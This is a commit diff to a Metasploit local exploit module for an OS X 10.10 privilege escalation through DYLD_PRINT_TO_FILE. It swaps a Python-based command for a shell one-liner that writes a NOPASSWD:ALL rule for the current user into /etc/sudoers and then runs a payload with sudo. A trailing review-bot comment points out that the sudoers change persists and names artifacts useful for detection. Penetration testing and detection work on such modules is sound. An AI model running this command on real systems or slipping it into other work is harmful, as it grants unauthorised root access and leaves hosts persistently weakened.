Remove python dependency, add credit URL.

bug/bundler_fix
joev 2015-07-21 22:47:52 -05:00
parent 3013ab4724
commit 165cb195bf
1 changed files with 3 additions and 5 deletions


@ -25,7 +25,8 @@ class Metasploit4 < Msf::Exploit::Local
'joev' # Copy/paste monkey
],
'References' => [
['URL', 'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
['URL', 'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html'],
['URL', 'https://www.reddit.com/r/netsec/comments/3e34i2/os_x_1010_dyld_print_to_file_local_privilege/']
],
'DisclosureDate' => 'Jul 21 2015',
'License' => MSF_LICENSE,
@ -43,7 +44,6 @@ class Metasploit4 < Msf::Exploit::Local
))
register_options([
OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python']),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
])
end
@ -69,9 +69,7 @@ class Metasploit4 < Msf::Exploit::Local
end
def sploit
%Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
%Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
%Q|/bin/sh -c 'sudo #{payload_file} &'|
"/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
end
def binary_payload
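Review bot: The rewritten `sploit` string appends a `NOPASSWD:ALL` rule for the current user to `/etc/sudoers`, and nothing visible in these hunks removes it, so a host tested with this module stays weakened after the session ends. Cleanup may exist elsewhere in the class, which is not shown here; if it does not, document the side effect directly above `sploit`, for example `# NOTE: leaves a persistent NOPASSWD rule in /etc/sudoers; remove it from the target after testing`. The same artifacts serve detection and incident response: an unexpected change to `/etc/sudoers`, and `DYLD_PRINT_TO_FILE` set in the environment of `newgrp`.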